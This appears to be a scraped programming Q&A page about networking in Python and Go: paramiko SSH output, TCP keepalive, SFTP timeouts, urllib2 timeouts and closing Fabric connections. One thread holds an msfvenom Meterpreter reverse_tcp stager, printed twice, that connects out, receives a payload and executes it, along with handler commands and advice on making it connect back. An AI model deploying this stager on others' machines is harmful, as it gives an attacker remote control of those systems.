Paramiko get stdout from connection object (not exec_command) - python

I'm writing a script that uses paramiko to ssh onto several remote hosts and run a few checks. Some hosts are setup as fail-overs for others and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts the host will inform me that you need to connect to another 'active' IP and then close the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection, exec_command will obviously give me stdout and stderr, but the host is outputting this immediately upon connection, and it doesn't accept any other incoming requests/messages. It just closes after n seconds.
I don't want to have to wait until the timeout to move onto the next host and I'd also like to verify that that's the reason for not being able to connect and run the checks, otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, is greatly appreciated.

I figured out a way to get the data, it was pretty straight forward to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages, one saying it can't chdir to a particular directory, then a few milliseconds later it spits out another message stating that you need to connect to the other IP. If I send a command immediately after connecting (doesn't matter what command), exec_command will interpret this second message as the response. So for now I have a solution to my problem as I can check this string for a known message and change the flow of execution.
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.

Related

How to know if the remote tcp device is powered off

In my GO code, I am establishing a TCP connection as below:
conn, err1 := net.Dial("tcp", <remote_address>)
if err1 == nil {
buf := make([]byte, 256)
text, err := conn.Read(buf[:])
if err == io.EOF {
//remote connection close handle
fmt.Println("connection got reset by peer")
panic(err)
}
}
To simulate the other end, I am running a python script on a different computer, which opens a socket and sends some random data to the socket above lines of codes are listening to. Now my problem is, when I am killing this python code by pressing ctrl+C, the remote connection closed event is recognised finely by above code and I get a chance to handle that.
However, if I simply turn off the remote computer (where the python script is running) my code doesn't get notified at all.
In my case, the connection should always be opened and should be able to send the data randomly, and only if the remote machine gets powered off, my GO code should get notified.
Can someone help me in this scenario, how would I get notification when the remote machine hosting the socket itself gets powered off? How would I get the trigger remotely in my GO code?
PS - This seems to be a pretty common problem in real time, though not in the testing environment.
There is no way to determine the difference between a host that is powered off and a connection that has been broken, so you treat them the same way.
You can send a heartbeat message on your own, and close the connection when you reach some timeout period between heartbeat packets. The timeout can either be set manually by timing the packets, or you can use SetReadDeadline before each read to terminate the connection immediately when the deadline is reached.
You can also use TCP Keepalive to do this for you, using TCPConn.SetKeepAlive to enable it and TCPConn.SetKeepAlivePeriod to set the interval between keepalive packets. The time it takes to actually close the connection will be system dependent.
You should also set a timeout when dialing, since connecting to a down host isn't guaranteed to return an ICMP Host Unreachable response. You can use DialTimeout, a net.Dialer with the Timeout parameter set, or Dialer.DialContext.
Simply reading through the stdlib documentation should provide you with plenty of information: https://golang.org/pkg/net/
You need to add some kind of heartbeat message. Then, looking at GO documentation, you can use DialTimeout instead of Dial, each time you receive the heartbeat message or any other you can reset the timeout.
Another alternative is to use TCP keepalive. Which you can do in Python by using setsockopt, I can't really help you with GO but this link seems like a good description of how to enable keepalive with it:
http://felixge.de/2014/08/26/tcp-keepalive-with-golang.html

Meterpreter not connecting back - Python

I have used msfvenom to create the following python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?
This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post after error searching, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN, as opposed to LAN, however it doesn't run the first time around. What ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})

Prevent SFTP/SSH session timeout with paramiko

I'm using paramiko to connect to an SFTP server on which I have to download and process some files.
The server has a timeout set to 5 minutes, but some days it happens that the processing of the files can take longer than the timeout. So, when I want to change the working directory on the server to process some other files sftp.chdir(target_dir)) I get an exception that the connection has timed out:
File
buildbdist.win32eggparamikosftp://ftp.py,
line 138, in _write_all raise
EOFError()
To counter this I thought that activating the keep alive would be the best option so I used the "set_keepalive" on the transport to set it to 30 seconds:
ssh = paramiko.SSHClient()
ssh.set_missing_hostkey_policy(paramiko.AutoAddPolicy())
ssh.connect(ssh_server, port=ssh_port, username=ssh_user, password=password)
transport = ssh.get_transport()
transport.set_keepalive(30)
sftp = transport.open_sftp_client()
But nothing changes at all. The change has absolutely no effect. I don't know if I'm misunderstanding the concept of set_keepalive here or maybe the server (on which I have no access) ignores the keep alive packets.
Isn't this the right way to counter this problem or should I try a different approach? I don't like the idea of "manually" sending some ls command to the server to keep the session alive.
If the server is timing you out for inactivity, there's not much you can do from the client-side (other than perhaps send a simple command every now and again to keep your session from timing out).
Have you considered breaking apart your download and processing steps, so that you can download everything you need to start with, then process it either asynchronously, or after all downloads have completed?

Python urllib2.urlopen bug: timeout error brings down my Internet connection?

I don't know if I'm doing something wrong, but I'm 100% sure it's the python script brings down my Internet connection.
I wrote a python script to scrape thousands of files header info, mainly for Content-Length to get the exact size of each file, using HEAD request.
Sample code:
class HeadRequest(urllib2.Request):
def get_method(self):
return "HEAD"
response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is after several hours running, the script starts to throw out urlopen error timed out, and my Internet connection is down from then on. And my Internet connection will always be back on immediately after I close that script. At the beginning I thought it might be the connection not stable, but after several times running, it turned out to be the scripts fault.
I don't know why, this should be considered as a bug, right? Or my ISP banned me for doing such things? (I already set the program to wait 10s each request)
BTW, I'm using VPN network, does it have something to do with this?
I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.
"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update Your Question with this information, and how you got it.
If only the computer running the script is stopped, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually its sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly what operating system you're using. You need to use this diagnostic software to see how many open sockets are cluttering up your system.

Disconnecting from host with Python Fabric when using the API

The website says:
Closing connections: Fabric’s
connection cache never closes
connections itself – it leaves this up
to whatever is using it. The fab tool
does this bookkeeping for you: it
iterates over all open connections and
closes them just before it exits
(regardless of whether the tasks
failed or not.)
Library users will need to ensure they
explicitly close all open connections
before their program exits, though we
plan to makes this easier in the
future.
I have searched everywhere, but I can't find out how to disconnect or close the connections. I am looping through my hosts and setting env.host_string. It is working, but hangs when exiting. Any help on how to close? Just to reiterate, I am using the library, not a fabfile.
If you don't want to have to iterate through all open connections, fabric.network.disconnect_all() is what you're looking for. The docstring reads
"""
Disconnect from all currently connected servers.
Used at the end of fab's main loop, and also intended for use by library users.
"""
The main.py for fabric has this:
from fabric.state import commands, connections
for key in connections.keys():
if state.output.status:
print "Disconnecting from %s..." %, denormalize(key), connections[key].close()
fabric.state.connections is a dict with the value being: paramiko.SSHClient
So off I go to close those.
You can disconnect from a specific connection, by host name, using the following code snippet (with fabric 1.10.1):
def disconnect(host):
host = host or fabric.api.env.host_string
if host and host in fabric.state.connections:
fabric.state.connections[host].get_transport().close()
from fabric.network import disconnect_all
disconnect_all()

Categories